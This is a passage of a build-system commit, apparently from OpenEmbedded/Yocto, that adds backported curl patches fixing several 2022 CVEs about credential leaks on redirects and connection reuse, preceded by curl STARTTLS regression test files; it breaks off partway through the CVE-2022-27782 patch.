++--
++  yours sincerely
++</data>
++</reply>
++
++#
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++pop3
++</server>
++ <name>
++POP3 STARTTLS pipelined server response
++ </name>
++ <command>
++pop3://%HOSTIP:%POP3PORT/%TESTNUMBER -u user:secret --ssl
++ </command>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++# 8 is CURLE_WEIRD_SERVER_REPLY
++<errorcode>
++8
++</errorcode>
++<protocol>
++CAPA
++STLS
++</protocol>
++</verify>
++</testcase>
+diff --git a/tests/data/test983 b/tests/data/test983
+new file mode 100644
+index 0000000..300ec45
+--- /dev/null
++++ b/tests/data/test983
+@@ -0,0 +1,52 @@
++<testcase>
++<info>
++<keywords>
++FTP
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++REPLY AUTH 500 unknown command\r\n500 unknown command\r\n331 give password\r\n230 Authenticated\r\n257 "/"\r\n200 OK\r\n200 OK\r\n200 OK\r\n226 Transfer complete
++REPLY PASS 530 Login incorrect
++</servercmd>
++</reply>
++
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++ftp
++</server>
++ <name>
++FTP STARTTLS pipelined server response
++ </name>
++<file name="log/test%TESTNUMBER.txt">
++data
++    to
++      see
++that FTPS
++works
++  so does it?
++</file>
++ <command>
++--ssl --ftp-ssl-control ftp://%HOSTIP:%FTPPORT/%TESTNUMBER -T log/test%TESTNUMBER.txt -u user:secret -P %CLIENTIP
++</command>
++</client>
++
++# Verify data after the test has been "shot"
++<verify>
++# 8 is CURLE_WEIRD_SERVER_REPLY
++<errorcode>
++8
++</errorcode>
++<protocol>
++AUTH SSL
++</protocol>
++</verify>
++</testcase>
diff --git a/meta/recipes-support/curl/curl/CVE-2022-22576.patch b/meta/recipes-support/curl/curl/CVE-2022-22576.patch
new file mode 100644
index 0000000000..13479e7f0e
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-22576.patch
@@ -0,0 +1,148 @@
+From 852aa5ad351ea53e5f01d2f44b5b4370c2bf5425 Mon Sep 17 00:00:00 2001
+From: Patrick Monnerat <patrick@monnerat.net>
+Date: Mon, 25 Apr 2022 11:44:05 +0200
+Subject: [PATCH] url: check sasl additional parameters for connection reuse.
+
+Also move static function safecmp() as non-static Curl_safecmp() since
+its purpose is needed at several places.
+
+Bug: https://curl.se/docs/CVE-2022-22576.html
+
+CVE-2022-22576
+
+Closes #8746
+---
+ lib/strcase.c   | 10 ++++++++++
+ lib/strcase.h   |  2 ++
+ lib/url.c       | 13 ++++++++++++-
+ lib/urldata.h   |  1 +
+ lib/vtls/vtls.c | 21 ++++++---------------
+ 5 files changed, 31 insertions(+), 16 deletions(-)
+
+CVE: CVE-2022-22576
+Upstream-Status: Backport [https://github.com/curl/curl/commit/852aa5ad351ea53e5f01d2f44b5b4370c2bf5425.patch]
+Comment: Refreshed patch
+Signed-off-by: Sana.Kazi <Sana.Kazi@kpit.com>
+
+diff --git a/lib/strcase.c b/lib/strcase.c
+index dd46ca1ba0e5..692a3f14aee7 100644
+--- a/lib/strcase.c
++++ b/lib/strcase.c
+@@ -251,6 +251,16 @@
+   } while(*src++ && --n);
+ }
+ 
++/* Compare case-sensitive NUL-terminated strings, taking care of possible
++ * null pointers. Return true if arguments match.
++ */
++bool Curl_safecmp(char *a, char *b)
++{
++  if(a && b)
++    return !strcmp(a, b);
++  return !a && !b;
++}
++
+ /* --- public functions --- */
+ 
+ int curl_strequal(const char *first, const char *second)
+diff --git a/lib/strcase.h b/lib/strcase.h
+index b234d3815220..2635f5117e99 100644
+--- a/lib/strcase.h
++++ b/lib/strcase.h
+@@ -48,4 +48,6 @@
+ void Curl_strntoupper(char *dest, const char *src, size_t n);
+ void Curl_strntolower(char *dest, const char *src, size_t n);
+ 
++bool Curl_safecmp(char *a, char *b);
++
+ #endif /* HEADER_CURL_STRCASE_H */
+diff --git a/lib/url.c b/lib/url.c
+index 9a988b4d58d8..e1647b133854 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -730,6 +730,7 @@
+   Curl_safefree(conn->allocptr.host);
+   Curl_safefree(conn->allocptr.cookiehost);
+   Curl_safefree(conn->allocptr.rtsp_transport);
++  Curl_safefree(conn->oauth_bearer);  
+   Curl_safefree(conn->trailer);
+   Curl_safefree(conn->host.rawalloc); /* host name buffer */
+   Curl_safefree(conn->conn_to_host.rawalloc); /* host name buffer */
+@@ -1251,7 +1252,9 @@
+         /* This protocol requires credentials per connection,
+            so verify that we're using the same name and password as well */
+         if(strcmp(needle->user, check->user) ||
+-           strcmp(needle->passwd, check->passwd)) {
++           strcmp(needle->passwd, check->passwd) ||
++           !Curl_safecmp(needle->sasl_authzid, check->sasl_authzid) ||
++           !Curl_safecmp(needle->oauth_bearer, check->oauth_bearer)) {			
+           /* one of them was different */
+           continue;
+         }
+@@ -3392,6 +3395,14 @@
+       result = CURLE_OUT_OF_MEMORY;
+       goto out;
+     }
++  }
++
++  if(data->set.str[STRING_BEARER]) {
++    conn->oauth_bearer = strdup(data->set.str[STRING_BEARER]);
++    if(!conn->oauth_bearer) {
++      result = CURLE_OUT_OF_MEMORY;
++      goto out;
++    }
+   }
+ 
+ #ifdef USE_UNIX_SOCKETS
+diff --git a/lib/urldata.h b/lib/urldata.h
+index 07eb19b87034..1d89b8d7fa68 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -949,6 +949,8 @@
+ 
+   char *sasl_authzid;     /* authorisation identity string, allocated */
+ 
++  char *oauth_bearer; /* OAUTH2 bearer, allocated */
++
+   int httpversion;        /* the HTTP version*10 reported by the server */
+   int rtspversion;        /* the RTSP version*10 reported by the server */
+ 
+diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
+index 03b85ba065e5..a40ac06f684f 100644
+--- a/lib/vtls/vtls.c
++++ b/lib/vtls/vtls.c
+@@ -82,15 +82,6 @@
+   else                                       \
+     dest->var = NULL;
+ 
+-static bool safecmp(char *a, char *b)
+-{
+-  if(a && b)
+-    return !strcmp(a, b);
+-  else if(!a && !b)
+-    return TRUE; /* match */
+-  return FALSE; /* no match */
+-}
+-
+ 
+ bool
+ Curl_ssl_config_matches(struct ssl_primary_config* data,
+@@ -101,12 +101,12 @@
+      (data->verifypeer == needle->verifypeer) &&
+      (data->verifyhost == needle->verifyhost) &&
+      (data->verifystatus == needle->verifystatus) &&
+-     safecmp(data->CApath, needle->CApath) &&
+-     safecmp(data->CAfile, needle->CAfile) &&
+-     safecmp(data->issuercert, needle->issuercert) &&
+-     safecmp(data->clientcert, needle->clientcert) &&
+-     safecmp(data->random_file, needle->random_file) &&
+-     safecmp(data->egdsocket, needle->egdsocket) &&
++     Curl_safecmp(data->CApath, needle->CApath) &&
++     Curl_safecmp(data->CAfile, needle->CAfile) &&
++     Curl_safecmp(data->issuercert, needle->issuercert) &&
++     Curl_safecmp(data->clientcert, needle->clientcert) &&
++     Curl_safecmp(data->random_file, needle->random_file) &&
++     Curl_safecmp(data->egdsocket, needle->egdsocket) &&     
+      Curl_safe_strcasecompare(data->cipher_list, needle->cipher_list) &&
+      Curl_safe_strcasecompare(data->cipher_list13, needle->cipher_list13) &&
+      Curl_safe_strcasecompare(data->pinned_key, needle->pinned_key))
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27774-1.patch b/meta/recipes-support/curl/curl/CVE-2022-27774-1.patch
new file mode 100644
index 0000000000..063c11712a
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27774-1.patch
@@ -0,0 +1,45 @@
+From 2a797e099731facf62a2c675396334bc2ad3bc7c Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 25 Apr 2022 16:24:33 +0200
+Subject: [PATCH] connect: store "conn_remote_port" in the info struct
+
+To make it available after the connection ended.
+
+Prerequisite for the patches that address CVE-2022-27774.
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/08b8ef4e726ba10f45081ecda5b3cea788d3c839]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/connect.c | 1 +
+ lib/urldata.h | 6 +++++-
+ 2 files changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/lib/connect.c b/lib/connect.c
+index b3d4057..a977d67 100644
+--- a/lib/connect.c
++++ b/lib/connect.c
+@@ -624,6 +624,7 @@ void Curl_persistconninfo(struct connectdata *conn)
+   conn->data->info.conn_scheme = conn->handler->scheme;
+   conn->data->info.conn_protocol = conn->handler->protocol;
+   conn->data->info.conn_primary_port = conn->primary_port;
++  conn->data->info.conn_remote_port = conn->remote_port;
+   conn->data->info.conn_local_port = conn->local_port;
+ }
+ 
+diff --git a/lib/urldata.h b/lib/urldata.h
+index fafb7a3..ab1b267 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1148,7 +1148,11 @@ struct PureInfo {
+      reused, in the connection cache. */
+ 
+   char conn_primary_ip[MAX_IPADR_LEN];
+-  long conn_primary_port;
++  long conn_primary_port; /* this is the destination port to the connection,
++                             which might have been a proxy */
++  long conn_remote_port;  /* this is the "remote port", which is the port
++                             number of the used URL, independent of proxy or
++                             not */
+   char conn_local_ip[MAX_IPADR_LEN];
+   long conn_local_port;
+   const char *conn_scheme;
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27774-2.patch b/meta/recipes-support/curl/curl/CVE-2022-27774-2.patch
new file mode 100644
index 0000000000..c64d614194
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27774-2.patch
@@ -0,0 +1,80 @@
+From 5c2f3b3a5f115625134669d90d591de9c5aafc8e Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 25 Apr 2022 16:24:33 +0200
+Subject: [PATCH] transfer: redirects to other protocols or ports clear auth
+
+... unless explicitly permitted.
+
+Bug: https://curl.se/docs/CVE-2022-27774.html
+Reported-by: Harry Sintonen
+Closes #8748
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/620ea21410030a9977396b4661806bc187231b79]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/transfer.c | 49 ++++++++++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 48 insertions(+), 1 deletion(-)
+
+diff --git a/lib/transfer.c b/lib/transfer.c
+index 744e1c0..ac69d27 100644
+--- a/lib/transfer.c
++++ b/lib/transfer.c
+@@ -1627,10 +1627,57 @@ CURLcode Curl_follow(struct Curl_easy *data,
+       return CURLE_OUT_OF_MEMORY;
+   }
+   else {
+-
+     uc = curl_url_get(data->state.uh, CURLUPART_URL, &newurl, 0);
+     if(uc)
+       return Curl_uc_to_curlcode(uc);
++
++    /* Clear auth if this redirects to a different port number or protocol,
++       unless permitted */
++    if(!data->set.allow_auth_to_other_hosts && (type != FOLLOW_FAKE)) {
++      char *portnum;
++      int port;
++      bool clear = FALSE;
++
++      if(data->set.use_port && data->state.allow_port)
++        /* a custom port is used */
++        port = (int)data->set.use_port;
++      else {
++        uc = curl_url_get(data->state.uh, CURLUPART_PORT, &portnum,
++                          CURLU_DEFAULT_PORT);
++        if(uc) {
++          free(newurl);
++          return Curl_uc_to_curlcode(uc);
++        }
++        port = atoi(portnum);
++        free(portnum);
++      }
++      if(port != data->info.conn_remote_port) {
++        infof(data, "Clear auth, redirects to port from %u to %u",
++              data->info.conn_remote_port, port);
++        clear = TRUE;
++      }
++      else {
++        char *scheme;
++        const struct Curl_handler *p;
++        uc = curl_url_get(data->state.uh, CURLUPART_SCHEME, &scheme, 0);
++        if(uc) {
++          free(newurl);
++          return Curl_uc_to_curlcode(uc);
++        }
++
++        p = Curl_builtin_scheme(scheme);
++        if(p && (p->protocol != data->info.conn_protocol)) {
++          infof(data, "Clear auth, redirects scheme from %s to %s",
++                data->info.conn_scheme, scheme);
++          clear = TRUE;
++        }
++        free(scheme);
++      }
++      if(clear) {
++        Curl_safefree(data->set.str[STRING_USERNAME]);
++        Curl_safefree(data->set.str[STRING_PASSWORD]);
++      }
++    }
+   }
+ 
+   if(type == FOLLOW_FAKE) {
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27774-3.patch b/meta/recipes-support/curl/curl/CVE-2022-27774-3.patch
new file mode 100644
index 0000000000..a585f6a8fa
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27774-3.patch
@@ -0,0 +1,83 @@
+From 5dccf21ad49eed925e8f76b0cb844877239ce23d Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 25 Apr 2022 17:59:15 +0200
+Subject: [PATCH] openssl: don't leak the SRP credentials in redirects either
+
+Follow-up to 620ea21410030
+
+Reported-by: Harry Sintonen
+Closes #8751
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/139a54ed0a172adaaf1a78d6f4fff50b2c3f9e08]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/http.c         | 10 +++++-----
+ lib/http.h         |  6 ++++++
+ lib/vtls/openssl.c |  3 ++-
+ 3 files changed, 13 insertions(+), 6 deletions(-)
+
+diff --git a/lib/http.c b/lib/http.c
+index 8b16c09..5291c07 100644
+--- a/lib/http.c
++++ b/lib/http.c
+@@ -732,10 +732,10 @@ output_auth_headers(struct connectdata *conn,
+ }
+ 
+ /*
+- * allow_auth_to_host() tells if autentication, cookies or other "sensitive
+- * data" can (still) be sent to this host.
++ * Curl_allow_auth_to_host() tells if authentication, cookies or other
++ * "sensitive data" can (still) be sent to this host.
+  */
+-static bool allow_auth_to_host(struct Curl_easy *data)
++bool Curl_allow_auth_to_host(struct Curl_easy *data)
+ {
+   struct connectdata *conn = data->conn;
+   return (!data->state.this_is_a_follow ||
+@@ -816,7 +816,7 @@ Curl_http_output_auth(struct connectdata *conn,
+ 
+   /* To prevent the user+password to get sent to other than the original host
+      due to a location-follow */
+-  if(allow_auth_to_host(data)
++  if(Curl_allow_auth_to_host(data)
+      || conn->bits.netrc
+     )
+     result = output_auth_headers(conn, authhost, request, path, FALSE);
+@@ -1891,7 +1891,7 @@ CURLcode Curl_add_custom_headers(struct connectdata *conn,
+                    checkprefix("Cookie:", compare)) &&
+                   /* be careful of sending this potentially sensitive header to
+                      other hosts */
+-                  !allow_auth_to_host(data))			  
++                  !Curl_allow_auth_to_host(data))			  
+             ;
+           else {
+             result = Curl_add_bufferf(&req_buffer, "%s\r\n", compare);
+diff --git a/lib/http.h b/lib/http.h
+index 4c1825f..4fbae1d 100644
+--- a/lib/http.h
++++ b/lib/http.h
+@@ -273,4 +273,10 @@ Curl_http_output_auth(struct connectdata *conn,
+                       bool proxytunnel); /* TRUE if this is the request setting
+                                             up the proxy tunnel */
+ 
++/*
++ * Curl_allow_auth_to_host() tells if authentication, cookies or other
++ * "sensitive data" can (still) be sent to this host.
++ */
++bool Curl_allow_auth_to_host(struct Curl_easy *data);
++
+ #endif /* HEADER_CURL_HTTP_H */
+diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
+index 006a8c8..a14cecc 100644
+--- a/lib/vtls/openssl.c
++++ b/lib/vtls/openssl.c
+@@ -2739,7 +2739,8 @@ static CURLcode ossl_connect_step1(struct connectdata *conn, int sockindex)
+ #endif
+ 
+ #ifdef USE_TLS_SRP
+-  if(ssl_authtype == CURL_TLSAUTH_SRP) {
++  if((ssl_authtype == CURL_TLSAUTH_SRP) &&
++     Curl_allow_auth_to_host(data)) {
+     char * const ssl_username = SSL_SET_OPTION(username);
+ 
+     infof(data, "Using TLS-SRP username: %s\n", ssl_username);
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27774-4.patch b/meta/recipes-support/curl/curl/CVE-2022-27774-4.patch
new file mode 100644
index 0000000000..2258681cab
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27774-4.patch
@@ -0,0 +1,35 @@
+From 7395752e2f7b87dc8c8f2a7137075e2da554aaea Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Tue, 26 Apr 2022 07:46:19 +0200
+Subject: [PATCH] gnutls: don't leak the SRP credentials in redirects
+
+Follow-up to 620ea21410030 and 139a54ed0a172a
+
+Reported-by: Harry Sintonen
+Closes #8752
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/093531556203decd92d92bccd431edbe5561781c]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/vtls/gtls.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/lib/vtls/gtls.c b/lib/vtls/gtls.c
+index 8c05102..3d0758d 100644
+--- a/lib/vtls/gtls.c
++++ b/lib/vtls/gtls.c
+@@ -581,11 +581,11 @@ gtls_connect_step1(struct connectdata *conn,
+   }
+ 
+ #ifdef USE_TLS_SRP
+-  if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP) {
++  if((SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP) &&
++     Curl_allow_auth_to_host(data)) {
+     infof(data, "Using TLS-SRP username: %s\n", SSL_SET_OPTION(username));
+ 
+-    rc = gnutls_srp_allocate_client_credentials(
+-           &BACKEND->srp_client_cred);
++    rc = gnutls_srp_allocate_client_credentials(&BACKEND->srp_client_cred);
+     if(rc != GNUTLS_E_SUCCESS) {
+       failf(data, "gnutls_srp_allocate_client_cred() failed: %s",
+             gnutls_strerror(rc));
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27775.patch b/meta/recipes-support/curl/curl/CVE-2022-27775.patch
new file mode 100644
index 0000000000..b3fe7b4494
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27775.patch
@@ -0,0 +1,39 @@
+From 058f98dc3fe595f21dc26a5b9b1699e519ba5705 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 25 Apr 2022 11:48:00 +0200
+Subject: [PATCH] conncache: include the zone id in the "bundle" hashkey
+
+Make connections to two separate IPv6 zone ids create separate
+connections.
+
+Reported-by: Harry Sintonen
+Bug: https://curl.se/docs/CVE-2022-27775.html
+Closes #8747
+---
+ lib/conncache.c | 8 ++++++--
+ 1 file changed, 6 insertions(+), 2 deletions(-)
+
+CVE: CVE-2022-27775
+Upstream-Status: Backport [https://github.com/curl/curl/commit/058f98dc3fe595f21dc26a5b9b1699e519ba5705.patch]
+Comment: Refreshed patch
+Signed-off-by: Sana.Kazi <Sana.Kazi@kpit.com>
+
+diff --git a/lib/conncache.c b/lib/conncache.c
+index ec669b971dc3..8948b53fa500 100644
+--- a/lib/conncache.c
++++ b/lib/conncache.c
+@@ -156,8 +156,12 @@
+     /* report back which name we used */
+     *hostp = hostname;
+ 
+-  /* put the number first so that the hostname gets cut off if too long */
+-  msnprintf(buf, len, "%ld%s", port, hostname);
++  /* put the numbers first so that the hostname gets cut off if too long */
++#ifdef ENABLE_IPV6
++  msnprintf(buf, len, "%u/%ld/%s", conn->scope_id, port, hostname);
++#else
++  msnprintf(buf, len, "%ld/%s", port, hostname);
++#endif
+ }
+ 
+ /* Returns number of connections currently held in the connection cache.
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27776.patch b/meta/recipes-support/curl/curl/CVE-2022-27776.patch
new file mode 100644
index 0000000000..1a13df2d95
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27776.patch
@@ -0,0 +1,114 @@
+From 6e659993952aa5f90f48864be84a1bbb047fc258 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 25 Apr 2022 13:05:40 +0200
+Subject: [PATCH] http: avoid auth/cookie on redirects same host diff port
+
+CVE-2022-27776
+
+Reported-by: Harry Sintonen
+Bug: https://curl.se/docs/CVE-2022-27776.html
+Closes #8749
+---
+ lib/http.c    | 34 ++++++++++++++++++++++------------
+ lib/urldata.h | 16 +++++++++-------
+ 2 files changed, 31 insertions(+), 19 deletions(-)
+
+CVE: CVE-2022-27776
+Upstream-Status: Backport [https://github.com/curl/curl/commit/6e659993952aa5f90f48864be84a1bbb047fc258.patch]
+Comment: Refreshed patch
+Signed-off-by: Sana.Kazi <Sana.Kazi@kpit.com>
+
+diff --git a/lib/http.c b/lib/http.c
+index ce79fc4e31c8..f0476f3b9272 100644
+--- a/lib/http.c
++++ b/lib/http.c
+@@ -731,6 +731,21 @@
+   return CURLE_OK;
+ }
+ 
++/*
++ * allow_auth_to_host() tells if autentication, cookies or other "sensitive
++ * data" can (still) be sent to this host.
++ */
++static bool allow_auth_to_host(struct Curl_easy *data)
++{
++  struct connectdata *conn = data->conn;
++  return (!data->state.this_is_a_follow ||
++          data->set.allow_auth_to_other_hosts ||
++          (data->state.first_host &&
++           strcasecompare(data->state.first_host, conn->host.name) &&
++           (data->state.first_remote_port == conn->remote_port) &&
++           (data->state.first_remote_protocol == conn->handler->protocol)));
++}
++
+ /**
+  * Curl_http_output_auth() setups the authentication headers for the
+  * host/proxy and the correct authentication
+@@ -799,15 +799,12 @@
+        with it */
+     authproxy->done = TRUE;
+ 
+-  /* To prevent the user+password to get sent to other than the original
+-     host due to a location-follow, we do some weirdo checks here */
+-  if(!data->state.this_is_a_follow ||
+-     conn->bits.netrc ||
+-     !data->state.first_host ||
+-     data->set.allow_auth_to_other_hosts ||
+-     strcasecompare(data->state.first_host, conn->host.name)) {
++  /* To prevent the user+password to get sent to other than the original host
++     due to a location-follow */
++  if(allow_auth_to_host(data)
++     || conn->bits.netrc
++    )
+     result = output_auth_headers(conn, authhost, request, path, FALSE);
+-  }
+   else
+     authhost->done = TRUE;
+ 
+@@ -1879,10 +1891,7 @@
+                    checkprefix("Cookie:", compare)) &&
+                   /* be careful of sending this potentially sensitive header to
+                      other hosts */
+-                  (data->state.this_is_a_follow &&
+-                   data->state.first_host &&
+-                   !data->set.allow_auth_to_other_hosts &&
+-                   !strcasecompare(data->state.first_host, conn->host.name)))
++                  !allow_auth_to_host(data))			  
+             ;
+           else {
+             result = Curl_add_bufferf(&req_buffer, "%s\r\n", compare);
+@@ -2065,6 +2074,7 @@
+       return CURLE_OUT_OF_MEMORY;
+ 
+     data->state.first_remote_port = conn->remote_port;
++    data->state.first_remote_protocol = conn->handler->protocol;    
+   }
+ 
+   if((conn->handler->protocol&(PROTO_FAMILY_HTTP|CURLPROTO_FTP)) &&
+diff --git a/lib/urldata.h b/lib/urldata.h
+index 1d89b8d7fa68..ef2174d9e727 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1342,13 +1342,15 @@
+   char *ulbuf; /* allocated upload buffer or NULL */
+   curl_off_t current_speed;  /* the ProgressShow() function sets this,
+                                 bytes / second */
+-  char *first_host; /* host name of the first (not followed) request.
+-                       if set, this should be the host name that we will
+-                       sent authorization to, no else. Used to make Location:
+-                       following not keep sending user+password... This is
+-                       strdup() data.
+-                    */
+-  int first_remote_port; /* remote port of the first (not followed) request */
++
++  /* host name, port number and protocol of the first (not followed) request.
++     if set, this should be the host name that we will sent authorization to,
++     no else. Used to make Location: following not keep sending user+password.
++     This is strdup()ed data. */
++  char *first_host;
++  int first_remote_port;
++  unsigned int first_remote_protocol;
++
+   struct curl_ssl_session *session; /* array of 'max_ssl_sessions' size */
+   long sessionage;                  /* number of the most recent session */
+   unsigned int tempcount; /* number of entries in use in tempwrite, 0 - 3 */
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27781.patch b/meta/recipes-support/curl/curl/CVE-2022-27781.patch
new file mode 100644
index 0000000000..ea1bc22928
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27781.patch
@@ -0,0 +1,46 @@
+From 7a1f183039a6a6c9099a114f5e5c94777413c767 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 9 May 2022 10:07:15 +0200
+Subject: [PATCH] nss: return error if seemingly stuck in a cert loop
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+CVE-2022-27781
+
+Reported-by: Florian Kohnhäuser
+Bug: https://curl.se/docs/CVE-2022-27781.html
+Closes #8822
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/5c7da89d404bf59c8dd82a001119a16d18365917]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/vtls/nss.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/lib/vtls/nss.c b/lib/vtls/nss.c
+index 375c78b..86102f7 100644
+--- a/lib/vtls/nss.c
++++ b/lib/vtls/nss.c
+@@ -950,6 +950,9 @@ static void display_cert_info(struct Curl_easy *data,
+   PR_Free(common_name);
+ }
+ 
++/* A number of certs that will never occur in a real server handshake */
++#define TOO_MANY_CERTS 300
++
+ static CURLcode display_conn_info(struct connectdata *conn, PRFileDesc *sock)
+ {
+   CURLcode result = CURLE_OK;
+@@ -986,6 +989,11 @@ static CURLcode display_conn_info(struct connectdata *conn, PRFileDesc *sock)
+         cert2 = CERT_FindCertIssuer(cert, now, certUsageSSLCA);
+         while(cert2) {
+           i++;
++          if(i >= TOO_MANY_CERTS) {
++            CERT_DestroyCertificate(cert2);
++            failf(data, "certificate loop");
++            return CURLE_SSL_CERTPROBLEM;
++          }
+           if(cert2->isRoot) {
+             CERT_DestroyCertificate(cert2);
+             break;
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27782-1.patch b/meta/recipes-support/curl/curl/CVE-2022-27782-1.patch
new file mode 100644
index 0000000000..6b6d0e1938
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27782-1.patch
@@ -0,0 +1,363 @@
+From 907a16c832d9ce0ffa7e9b2297548063095a7242 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 9 May 2022 23:13:53 +0200
+Subject: [PATCH] tls: check more TLS details for connection reuse
+
+CVE-2022-27782
+
+Reported-by: Harry Sintonen
+Bug: https://curl.se/docs/CVE-2022-27782.html
+Closes #8825
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/f18af4f874cecab82a9797e8c7541e0990c7a64c]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/setopt.c       | 29 +++++++++++++++++------------
+ lib/url.c          | 17 ++++++++++-------
+ lib/urldata.h      | 13 +++++++------
+ lib/vtls/gtls.c    | 30 ++++++++++++++++--------------
+ lib/vtls/mbedtls.c |  2 +-
+ lib/vtls/nss.c     |  6 +++---
+ lib/vtls/openssl.c | 10 +++++-----
+ lib/vtls/vtls.c    |  1 +
+ 8 files changed, 60 insertions(+), 48 deletions(-)
+
+diff --git a/lib/setopt.c b/lib/setopt.c
+index 4648c87..bebb2e4 100644
+--- a/lib/setopt.c
++++ b/lib/setopt.c
+@@ -2130,6 +2130,7 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
+ 
+   case CURLOPT_SSL_OPTIONS:
+     arg = va_arg(param, long);
++    data->set.ssl.primary.ssl_options = (unsigned char)(arg & 0xff);
+     data->set.ssl.enable_beast =
+       (bool)((arg&CURLSSLOPT_ALLOW_BEAST) ? TRUE : FALSE);
+     data->set.ssl.no_revoke = !!(arg & CURLSSLOPT_NO_REVOKE);
+@@ -2139,6 +2140,7 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
+ #ifndef CURL_DISABLE_PROXY
+   case CURLOPT_PROXY_SSL_OPTIONS:
+     arg = va_arg(param, long);
++    data->set.proxy_ssl.primary.ssl_options = (unsigned char)(arg & 0xff);
+     data->set.proxy_ssl.enable_beast =
+       (bool)((arg&CURLSSLOPT_ALLOW_BEAST) ? TRUE : FALSE);
+     data->set.proxy_ssl.no_revoke = !!(arg & CURLSSLOPT_NO_REVOKE);
+@@ -2541,44 +2543,47 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
+   case CURLOPT_TLSAUTH_USERNAME:
+     result = Curl_setstropt(&data->set.str[STRING_TLSAUTH_USERNAME_ORIG],
+                             va_arg(param, char *));
+-    if(data->set.str[STRING_TLSAUTH_USERNAME_ORIG] && !data->set.ssl.authtype)
+-      data->set.ssl.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
++    if(data->set.str[STRING_TLSAUTH_USERNAME_ORIG] &&
++       !data->set.ssl.primary.authtype)
++      data->set.ssl.primary.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
+     break;
+   case CURLOPT_PROXY_TLSAUTH_USERNAME:
+     result = Curl_setstropt(&data->set.str[STRING_TLSAUTH_USERNAME_PROXY],
+                             va_arg(param, char *));
+     if(data->set.str[STRING_TLSAUTH_USERNAME_PROXY] &&
+-       !data->set.proxy_ssl.authtype)
+-      data->set.proxy_ssl.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
++       !data->set.proxy_ssl.primary.authtype)
++      data->set.proxy_ssl.primary.authtype = CURL_TLSAUTH_SRP; /* default to
++                                                                  SRP */
+     break;
+   case CURLOPT_TLSAUTH_PASSWORD:
+     result = Curl_setstropt(&data->set.str[STRING_TLSAUTH_PASSWORD_ORIG],
+                             va_arg(param, char *));
+-    if(data->set.str[STRING_TLSAUTH_USERNAME_ORIG] && !data->set.ssl.authtype)
+-      data->set.ssl.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
++    if(data->set.str[STRING_TLSAUTH_USERNAME_ORIG] &&
++       !data->set.ssl.primary.authtype)
++      data->set.ssl.primary.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
+     break;
+   case CURLOPT_PROXY_TLSAUTH_PASSWORD:
+     result = Curl_setstropt(&data->set.str[STRING_TLSAUTH_PASSWORD_PROXY],
+                             va_arg(param, char *));
